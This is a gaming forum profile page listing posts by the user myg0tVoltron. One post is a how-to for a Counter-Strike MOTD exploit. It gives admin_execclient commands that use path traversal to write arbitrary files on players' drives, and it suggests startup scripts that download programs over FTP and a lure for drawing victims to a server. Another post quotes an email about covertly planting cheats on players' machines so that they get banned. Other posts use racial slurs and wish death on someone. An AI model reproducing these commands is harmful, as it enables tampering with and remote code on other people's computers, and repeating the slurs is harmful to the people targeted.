Jump to content

myg0tVoltron

myg0t
  • Joined

Everything posted by myg0tVoltron

  1. myg0tVoltron posted a post in a topic in General Discussion
    stfu tahts my earthlink account k u stupid chink
  2. wtf modifying anything isnt against the law. you can rape the fuck out of the exe and its legal. its just against the eula. the eula isnt the fucking law dumbshits. its just your user license and if u do something like that it just terminates your license.
  3. myg0tVoltron posted a post in a topic in General Discussion
    no i made the image see http://home.earthlink.net/~jeremy.baker/images/lolcano.gif
  4. myg0tVoltron posted a post in a topic in General Discussion
    http://www.google.com/search?hl=en&ie=UTF-8&q=lolcano
  5. **News** Apparently im not the first one who discovered this motd thing. I got an email today from a guy named Lucifer that says he found it a year and a half ago or so. ------------------ Hello my name is Lucifer, I saw your thread on myg0t forums about the MOTD exploit. Well I was the original person who discovered it about a year and a half ago(as far as I know) and I found a good use for it >=). A few friends of mine and I have set up some servers with auto downloaders set to download to peoples pc's at random intervals. The downloader connects to an ftp of ours and then randomly downloads a vac detected cheat to the clients pc. We keep the database of cheats updated with the cheat sites so it would be more believable. The downloader retrieves the cheats from the ftp at random times and dates and the person is then vac banned. Once the downloader detects the user has been banned it deletes itself along with the cheat. Many of the recent vac bannings are probably from us. We have been running these servers for about 8 or 9 months now and still nobody has figured it out. Unfortunately you discovered our method and publicly posted it so valve will most likely fix it in the coming days. If you would like any of my source codes please email me back. We have edited amx mod so that it does not display the admin_execclient to everyone and it hides it in the console as well. Please hurry if you would like my source codes, valve can fix this bug quickly now via steam :(. ------------------------ rifk this guy fucking owns i emailed him back so hopefully he send me the code
  6. pic #2 looks like a zombie trying to cut its dick off pic #4 looks like a midget spic priest holding shit or a small animal i want to kill that fat spic.. he deserves to die
  7. fucking cheneybot
  8. ya it is gay. if u know of any servers that have the old swear exploit where u can control people you can do this or u can set up ur own server or just find a rcon pw somewhere
  9. Counter-strike MOTD exploit What you can do. You can overwrite any file on a players hard drive. you can create a file anywhere on their harddrive. you can write whatever you want to this file. how its done: this exploit is for admins but dont think its useless because of this. the commands used are: motd_write <--this writes to the file use \n to skip lines in the file motdfile <--this tells the client where the file is these are client side commands. but they can be run on clients using admin mod. admin_execclient name "motdfile ../userconfig.cfg" admin_execclient name "motd_write whateveryou want here" admin_execall <-- this will do it to everyone this is an example of what you can do. it would create the file "userconfig.cfg" in the cstrike folder. ../ tells it to create the file in the previous directory. you can use this to do basically anything you want, the only exception is that some ascii codes cannot be sent through via console and whole programs or dlls cannot be created. instead you will have to create something like an autoexec.bat that uses basic command lines and download a program or dll to their pc via FTP. the autoexec programs should be created in the startup folder according to the operating system they use. all you need to do this is get admin access on a server with adminmod to use this. how to get lots of ppl to join your server: go to irc.gamesurge.net and join #findscrim search for people that say 5vs5 YOURS <-- this means they want to play a match on your server. you then send this person your server ip and they join. you can send all the people your ip and they will all join. then you can begin to have fun with them. example of a nice kill loop cfg that will kill the player every 3 seconds on whatever server he joins: admin_execclient name "motdfile ../userconfig.cfg" admin_execclient name "motd_write alias m_pitch "kill"" duno if the "" are needed for kill